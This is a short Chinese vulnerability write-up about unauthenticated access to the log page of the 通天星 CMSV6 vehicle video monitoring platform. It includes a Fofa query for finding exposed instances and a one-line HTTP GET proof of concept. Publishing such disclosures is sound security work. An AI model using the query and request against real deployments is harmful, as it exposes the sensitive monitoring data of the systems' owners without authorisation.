本文详细介绍了通天星CMSV6车载定位监控平台的LoggerManagement/logIndex.html功能页面存在的未授权访问漏洞。由于缺乏有效鉴权,攻击者能非法获取敏感信息。复现过程包括了搜索语法、漏洞POC和实际验证结果。
漏洞描述:
通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。
通天星CMSV6车载视频监控平台LoggerManagement/logIndex.html功能页面未进行有效鉴权操作,导致攻击者可以未授权获取敏感信息。
搜索语法:
Fofa-Query: web.body="/808gps/"
漏洞详情:
1.通天星CMSV6车载视频监控平台。
2.漏洞POC:
GET /808gps/LoggerManagement/logIndex.html HTTP/1.1
Host: {{Hostname}}
Accept: */*3.漏洞复现结果。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
